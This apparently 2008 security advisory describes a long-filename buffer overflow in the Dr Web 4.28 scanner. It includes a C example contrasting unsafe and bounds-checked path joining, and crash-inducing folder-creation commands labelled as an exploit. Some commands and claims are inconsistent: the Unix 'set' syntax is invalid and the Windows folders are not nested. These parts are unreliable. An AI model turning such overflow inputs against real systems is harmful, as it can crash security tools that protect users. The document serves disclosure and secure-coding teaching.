Security Software Necessary

Friday, July 11, 2008

Buffer overflow in cmd

Vulnerable versions:
* Dr Web Version 4.28 and below

Immune versions:
* Dr Web Version 4.29b and above

When a user with access to the system creates a file or folder with a very
long name, scanning it causes a buffer overflow that overwrites the saved
return address (EIP), thus granting the user the ability to execute
arbitrary code with root privileges.

The program consists of a monitor and a scanner. Only the scanner was
tested, on version 4.28a, and it was found vulnerable.
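The bug class the advisory describes, as an added example that is not Dr Web's code: a scanner builds the path of each entry it visits in a fixed-size stack buffer, and a name longer than that buffer overwrites what lies beyond it, including the saved return address. The buffer size, function names and the sample long name are assumptions made for the illustration; the hardened version shows the check that prevents the overflow by rejecting the name instead of copying it.

```c
/* Added example (not Dr Web's code): a fixed-size path buffer filled
 * without a length check, next to a bounds-checked replacement.
 * SCAN_PATH_MAX and the function names are assumed for illustration. */
#include <stdio.h>
#include <string.h>
#include <errno.h>

#define SCAN_PATH_MAX 256   /* assumed size of the on-stack path buffer */

/* Vulnerable pattern: the directory name chosen by a local user is
 * copied into a fixed buffer with no bound, so a name longer than
 * SCAN_PATH_MAX overwrites the stack above the buffer (saved registers
 * and the return address, i.e. EIP on 32-bit x86). Shown only for
 * contrast; never feed it untrusted input. */
void join_path_unsafe(char *out, const char *dir, const char *name)
{
    char buf[SCAN_PATH_MAX];
    strcpy(buf, dir);          /* no bound */
    strcat(buf, "/");
    strcat(buf, name);         /* the user controls this length */
    strcpy(out, buf);
}

/* Hardened version: the required length is computed first, every copy
 * is bounded by the caller-supplied size, and an over-long result is
 * rejected rather than truncated silently.
 * Returns 0 on success, -1 with errno = ENAMETOOLONG when it does not fit. */
int join_path_safe(char *out, size_t out_len, const char *dir, const char *name)
{
    size_t need = strlen(dir) + 1 + strlen(name) + 1;  /* dir + '/' + name + NUL */
    if (need > out_len) {
        errno = ENAMETOOLONG;
        return -1;
    }
    int n = snprintf(out, out_len, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= out_len) {
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[SCAN_PATH_MAX];
    char longname[1024];                 /* constructed: 1023 'A's, longer than the buffer */
    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    if (join_path_safe(path, sizeof path, "/tmp", "clean.txt") == 0)
        printf("ok: %s\n", path);
    if (join_path_safe(path, sizeof path, "/tmp", longname) != 0)
        printf("rejected: name too long (%zu bytes)\n", strlen(longname));
    return 0;
}
```

The safe version treats "does not fit" as an error the caller must handle, which is the behaviour a scanner needs: the entry is logged and skipped rather than the process crashing or running whatever the long name happened to contain.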

Exploit:
Build a folder with a very long name:

set a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
set b=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

mkdir /$a
mkdir /$a/$b

Or:

SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

mkdir \\?\c:\%A%
mkdir \\?\c:\%B%

Use whichever form matches the system: the first for a Unix shell, the second for the Windows command prompt.

When the anti-virus tries to scan the folder, it crashes.

Solution:
Download the latest version from Dr Web:
Newest Versions
